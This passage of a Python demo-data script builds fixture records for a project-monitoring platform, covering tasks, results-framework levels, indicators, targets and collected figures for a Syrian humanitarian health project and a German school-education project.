expected_end_date="2018-10-31T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=20, # 21
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Close the project',
expected_start_date="2018-09-03T11:00:00Z", # TODO
expected_end_date="2018-09-28T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=21, # 22
workflowlevel1=self._workflowlevel1s[3], # 15
parent_workflowlevel2=18, # 19
name='Debrief with the team',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="open",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=22,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Ansprache von 20 Partnerschulen in Berlin',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=23,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'20 Schulen in sozialen Brennpunkten identifizieren',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=24,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Ideen zur Gestaltung der Schule finden und umstetzen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=25,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=0,
name=u'Qualifizierung der Lehrer',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=26,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=25,
name=u'Lehrer auswählen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=27,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=25,
name=u'Trainings und Supervision durchführen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=28,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=24,
name=u'Ideenworkshops durchführen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="tracking",
status="yellow",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=29,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=22,
name=u'Direktoren ansprechen',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="closed",
status="green",
))
self._workflowlevel2s.append(factories.WorkflowLevel2(
id=30,
workflowlevel1=self._workflowlevel1s[6],
parent_workflowlevel2=24,
name=u'Budgets zur Umsetzung finden',
expected_start_date="2018-10-01T11:00:00Z", # TODO
expected_end_date="2018-09-30T11:00:00Z", # TODO
created_by=self._tolauser_ninette.user, # 11
progress="awaitingapproval",
status="red",
))
def _create_levels(self):
self._levels.append(factories.Level(
id=1, # 7
name="Goal",
description="Improved health and survival of Syrian communities affected by conflict",
color="navy",
organization=self._organization,
parent_id="0",
workflowlevel1=self._workflowlevel1s[3], # 15
sort=0,
))
self._levels.append(factories.Level(
id=2, # 8
name="Intermediate Result",
description="Improved recovery from injuries as a result of conflict",
color="red",
organization=self._organization,
parent_id="1", # 7
workflowlevel1=self._workflowlevel1s[3], # 15
sort=1,
))
self._levels.append(factories.Level(
id=3, # 9
name="Outcome 1",
description="Emergency medical services improve in areas where emergency medical kits are provided",
color="blue",
organization=self._organization,
parent_id="2", # 8
workflowlevel1=self._workflowlevel1s[3], # 15
sort=2,
))
self._levels.append(factories.Level(
id=4, # 10
name="Outcome 2",
description="Community members with improved knowledge of hygiene practices",
color="blue",
organization=self._organization,
parent_id="2", # 8
workflowlevel1=self._workflowlevel1s[3], # 15
sort=2,
))
self._levels.append(factories.Level(
id=5, # 11
name="Output 1",
description="Emergency Medical Kits are delivered to mobile medical units in conflict-affected populations",
color="green",
organization=self._organization,
parent_id="3", # 9
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=6, # 12
name="Output 2",
description="Treat injuries and emergency medical needs of affected communities",
color="green",
organization=self._organization,
parent_id="3", # 9
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=7, # 13
name="Output 3",
description="Hand Washing Knowledge and Capacity",
color="green",
organization=self._organization,
parent_id="4", # 10
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=8, # 14
name="Output 4",
description="Household Water Quality is Improved",
color="green",
organization=self._organization,
parent_id="4", # 10
workflowlevel1=self._workflowlevel1s[3], # 15
sort=3,
))
self._levels.append(factories.Level(
id=9,
name=(u"Impact: Verwirklichung des Kinderrechts auf Bildung in "
u"Deutschland"),
description=(u"Verwirklichung der Rechte Kindern aus sozial "
u"benachteiligten Bevölkerungsgruppen auf qualitativ "
u"hochwertige Bildung und Entwicklung"),
color="red",
organization=self._organization,
parent_id="0",
workflowlevel1=self._workflowlevel1s[6],
sort=0,
))
self._levels.append(factories.Level(
id=10,
name=u"Outcome: Gute Bildung und Lernen ermöglichen",
description=(u"Ziel ist es, Kindern unabhängig von ihrem "
u"Hintergrund und ihrer Herkunft die Möglichkeit auf "
u"gute Bildung und erfolgreiches Lernen zu "
u"ermöglichen"),
color="blue",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=11,
name=u"Outcome: Kooperation zwischen Eltern/Lehrern verbessern",
description=(u"Ziel ist es, eine stabile Beziehung zwischen "
u"Eltern und Lehrern zu bauen, Eltern in die "
u"Aktivitäten der Schule einzubeziehen und eine "
u"stabile Kommunikation aufzubauen."),
color="blue",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=12,
name=u"Outcome: Schulen familienfreundlicher gestalten",
description=(u"Ziel ist es, Schulen nicht nur als Raum zum Lernen, "
u"sondern auch zum Leben zu gestalten. Eine offene "
u"und vertrauensvolle Atmosphäre zu kreieren, in dem "
u"die ganze Persönlichkeit gesehen und gefördert "
u"wird."),
color="green",
organization=self._organization,
parent_id="9",
workflowlevel1=self._workflowlevel1s[6],
sort=1,
))
self._levels.append(factories.Level(
id=13,
name=u"Output: Schulungen für Familien durchführen",
description=u"",
color="green",
organization=self._organization,
parent_id="10",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=14,
name=u"Output: Elternbeteiligung stärken",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=15,
name=u"Output: Partnerschaftliches Verhältnis etablieren",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=16,
name=u"Output: Fortbildungen für Lehrer",
description=u"",
color="green",
organization=self._organization,
parent_id="10",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=17,
name=u"Output: Ideen partizipativ entwickeln und umsetzen",
description=u"",
color="green",
organization=self._organization,
parent_id="12",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
self._levels.append(factories.Level(
id=18,
name=u"Output: Sprachbarrieren abbauen",
description=u"",
color="green",
organization=self._organization,
parent_id="11",
workflowlevel1=self._workflowlevel1s[6],
sort=2,
))
def _create_frequencies(self):
self._frequencies.append(factories.Frequency(
id=1, # 2
frequency="Quarterly",
description="Quarterly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=2, # 4
frequency="Monthly",
description="Monthly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=3, # 5
frequency="Semi Annual",
description="Semi Annual",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=4, # 7
frequency="Annual",
description="Annual",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=5, # 8
frequency="Baseline, Endline",
description="Baseline, Endline",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=6, # 9
frequency="Weekly",
description="Weekly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=7, # 10
frequency="Baseline, midline, endline",
description="Baseline, midline, endline",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=8, # 11
frequency="Bi-weekly",
description="Bi-weekly",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=9, # 12
frequency="Monthly, Quarterly, Annually",
description="Monthly, Quarterly, Annually",
organization=self._organization,
))
self._frequencies.append(factories.Frequency(
id=10, # 16
frequency="End of cycle",
description="End of cycle",
organization=self._organization,
))
def _create_indicators(self):
self._indicators.append(factories.Indicator(
id=1, # 2
level=self._levels[1], # 7
name="# of individuals in a need of humanitarian assistance",
number="1",
lop_target=7500,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=2, # 3
level=self._levels[2], # 8
name="% of injured community members who make full recovery",
number="1.1",
lop_target=70,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=3, # 4
level=self._levels[3], # 9
name="% of mobile medical units who have adequate supply of emergency medical kits",
number="2.1",
lop_target=80,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=4, # 5
level=self._levels[4], # 10
name="% of respondents who know 3 of 5 critical times to wash hands",
number="3.1",
lop_target=75,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=5, # 6
level=self._levels[5], # 11
name="# of medical kits provided to partner mobile medical units",
number="2.1.1",
lop_target=2500,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=6, # 7
level=self._levels[5], # 11
name="% of emergency medical kits distributed within two weeks of identification of critical need",
number="2.1.2",
lop_target=60,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=7, # 8
level=self._levels[3], # 9
name="# of beneficiaries treated",
number="2.2.1",
lop_target=500,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=8, # 9
level=self._levels[6], # 12
name="# of locations set up by mobile medical units",
number="2.2.2",
lop_target=10,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=9, # 10
level=self._levels[6], # 12
name="# of days mobile medical units spent at each location",
number="2.2.3",
lop_target=5,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=10, # 11
level=self._levels[7], # 13
name="# of people receiving hygiene promotion",
number="3.1.1",
lop_target=5000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=11, # 12
level=self._levels[8], # 14
name="# of people receiving household water quality education",
number="3.2.1",
lop_target=5000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=12, # 13
level=self._levels[8], # 14
name="# of individuals in acute need of humanitarian assistance",
number="1",
lop_target=7500,
sector=self._sectors[44], # 173
key_performance_indicator=True,
created_by=self._tolauser_ninette.user, # 11
workflowlevel1=[self._workflowlevel1s[3]], # 15
))
self._indicators.append(factories.Indicator(
id=13,
level=self._levels[9],
name=u"Anzahl aktive Initiativen",
lop_target=5500,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=14,
level=self._levels[13],
name=u"Anzahl Schulungen",
number="5000",
lop_target=50000,
key_performance_indicator=True,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
method_of_analysis="Questionnaire",
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=15,
level=self._levels[12],
name=u"Ideenwerkstätten",
lop_target=15000,
key_performance_indicator=False,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=16,
level=self._levels[9],
name=u"Anzahl direkt erreichter Kinder",
lop_target=250000,
key_performance_indicator=True,
approval_submitted_by=self._tolauser_andrew,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
self._indicators.append(factories.Indicator(
id=17,
level=self._levels[11],
name=u"Mehrsprachige Informationsmaterialien (10 Sprachen)",
lop_target=600000,
sector=self._sectors[11],
key_performance_indicator=False,
approval_submitted_by=self._tolauser_andrew,
created_by=self._tolauser_ninette.user,
reporting_frequency=self._frequencies[9],
workflowlevel1=[self._workflowlevel1s[6]],
))
def _create_periodic_targets(self):
factories.PeriodicTarget(
id="1", # 1
period="February 2018",
target="500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id="2", # 2
period="March 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id="3", # 3
period="April 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=4, # 4
period="May 2018",
target="1500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=5, # 5
period="June 2018",
target="1500.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=6, # 6
period="July 2018",
target="1000.00",
indicator=self._indicators[1], # 2
)
factories.PeriodicTarget(
id=7, # 10
period="August 2018",
target="70.00",
indicator=self._indicators[2], # 3
)
factories.PeriodicTarget(
id=8, # 11
period="February 2018",
target="500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=9, # 12
period="March 2018",
target="500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=10, # 13
period="April 2018",
target="1000.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=11, # 14
period="May 2018",
target="1000.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=12, # 15
period="June 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=13, # 16
period="July 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=14, # 17
period="August 2018",
target="1500.00",
indicator=self._indicators[12], # 13
)
factories.PeriodicTarget(
id=15, # 18
period="August 2018",
target="80.00",
indicator=self._indicators[3], # 4
)
factories.PeriodicTarget(
id=16, # 19
period="February 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=17, # 20
period="March 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=18, # 21
period="April 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=19, # 22
period="May 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=20, # 23
period="June 2018",
target="100.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=21, # 24
period="July 2018",
target="50.00",
indicator=self._indicators[7], # 8
)
factories.PeriodicTarget(
id=22, # 26
period="August 2018",
target="75.00",
indicator=self._indicators[4], # 5
)
factories.PeriodicTarget(
id=23, # 27
period="February 2018",
target="250.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=24, # 28
period="March 2018",
target="250.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=25, # 29
period="April 2018",
target="500.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=26, # 30
period="May 2018",
target="500.00",
indicator=self._indicators[5], # 6
)
factories.PeriodicTarget(
id=27, # 34
period="August 2018",
target="60.00",
indicator=self._indicators[6], # 7
)
factories.PeriodicTarget(
id=28, # 35
period="February 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=29, # 36
period="March 2018",
target="2.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=30, # 37
period="April 2018",
target="3.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=31, # 38
period="May 2018",
target="2.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=32, # 39
period="June 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=33, # 40
period="August 2018",
target="1.00",
indicator=self._indicators[8], # 9
)
factories.PeriodicTarget(
id=34, # 41
period="August 2018",
target="5.00",
indicator=self._indicators[9], # 10
)
factories.PeriodicTarget(
id=35, # 42
period="July 2018",
target="2500.00",
indicator=self._indicators[10], # 11
)
factories.PeriodicTarget(
id=36, # 43
period="August 2018",
target="2500.00",
indicator=self._indicators[10], # 11
)
factories.PeriodicTarget(
id=37, # 44
period="July 2018",
target="2500.00",
indicator=self._indicators[11], # 12
)
factories.PeriodicTarget(
id=38, # 45
period="August 2018",
target="2500.00",
indicator=self._indicators[11], # 12
)
def _create_collected_data(self):
factories.CollectedData(
id=1,
periodic_target_id="1", # 1
achieved="500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=2,
periodic_target_id="2", # 2
achieved="500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]] # 6
)
factories.CollectedData(
id=3,
periodic_target_id="3", # 3
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=4,
periodic_target_id="5", # 5
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=5,
periodic_target_id="4", # 4
achieved="1000.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=6,
periodic_target_id="6", # 6
achieved="1500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=7,
periodic_target_id="6", # 6
achieved="1500.00",
indicator=self._indicators[1], # 2
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=8,
periodic_target_id="8", # 11
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=9,
periodic_target_id="9", # 12
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=10,
periodic_target_id="10", # 13
achieved="1000.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=11,
periodic_target_id="11", # 14
achieved="1000.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=12,
periodic_target_id="12", # 15
achieved="1500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=13,
periodic_target_id="13", # 16
achieved="1500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=14,
periodic_target_id="14", # 17
achieved="500.00",
indicator=self._indicators[12], # 13
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=15,
periodic_target_id="7", # 10
achieved="65.00",
indicator=self._indicators[2], # 3
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=16,
periodic_target_id="15", # 18
achieved="78.00",
indicator=self._indicators[3], # 4
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=17,
periodic_target_id="16", # 19
achieved="75.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=18,
periodic_target_id="17", # 20
achieved="100.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=19,
periodic_target_id="18", # 21
achieved="100.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=20,
periodic_target_id="19", # 22
achieved="90.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=21,
periodic_target_id="20", # 23
achieved="125.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[5]], # 9
)
factories.CollectedData(
id=22,
periodic_target_id="21", # 24
achieved="50.00",
indicator=self._indicators[7], # 8
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=23,
periodic_target_id="22", # 26
achieved="55.00",
indicator=self._indicators[4], # 5
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=24,
periodic_target_id="34", # 41
achieved="4.50",
indicator=self._indicators[9], # 10
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1], self._site_profiles[2], self._site_profiles[3], self._site_profiles[4], self._site_profiles[5]], # [5, 6, 7, 8, 9]
)
factories.CollectedData(
id=25,
periodic_target_id="23", # 27
achieved="500.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=26,
periodic_target_id="24", # 28
achieved="500.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=27,
periodic_target_id="25", # 29
achieved="1000.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=28,
periodic_target_id="26", # 30
achieved="300.00",
indicator=self._indicators[5], # 6
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=29,
periodic_target_id="27", # 34
achieved="55.00",
indicator=self._indicators[6], # 7
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=30,
periodic_target_id="28", # 35
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=31,
periodic_target_id="29", # 36
achieved="2.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=32,
periodic_target_id="30", # 37,
achieved="3.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[3]], # 7
)
factories.CollectedData(
id=33,
periodic_target_id="31", # 38
achieved="2.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[4]], # 8
)
factories.CollectedData(
id=34,
periodic_target_id="32", # 39
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=35,
periodic_target_id="33", # 40
achieved="1.00",
indicator=self._indicators[8], # 9
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=36,
periodic_target_id="35", # 42
achieved="2500.00",
indicator=self._indicators[10], # 11
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=37,
periodic_target_id="36", # 43
achieved="2000.00",
indicator=self._indicators[10], # 11
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=38,
periodic_target_id="37", # 44
achieved="2500.00",
indicator=self._indicators[11], # 12
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[1]], # 5
)
factories.CollectedData(
id=39,
periodic_target_id="38", # 45
achieved="2000.00",
indicator=self._indicators[11], # 12
workflowlevel1=self._workflowlevel1s[3], # 15
created_by=self._tolauser_ninette.user, # 11
site=[self._site_profiles[2]], # 6
)
factories.CollectedData(
id=40,
achieved="1500.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[6]],
)
factories.CollectedData(
id=41,
achieved="23000.00",
indicator=self._indicators[14],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=42,
achieved="3700.00",
indicator=self._indicators[15],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=43,
achieved="125000.00",
indicator=self._indicators[16],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=44,
achieved="500.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[6]],
)
factories.CollectedData(
id=45,
achieved="2300.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
)
factories.CollectedData(
id=46,
achieved="700.00",
indicator=self._indicators[13],
workflowlevel1=self._workflowlevel1s[6],
created_by=self._tolauser_ninette.user,
site=[self._site_profiles[7]],
)
def _create_workflowlevel1_sectors(self):
factories.WorkflowLevel1Sector(
id=1,
workflowlevel1=self._workflowlevel1s[3], # 15
sector=self._sectors[14], # 143
sub_sector=[self._sectors[37], self._sectors[38], self._sectors[39], self._sectors[40], self._sectors[41]], # [166, 167, 168, 169, 170]
)
factories.WorkflowLevel1Sector(
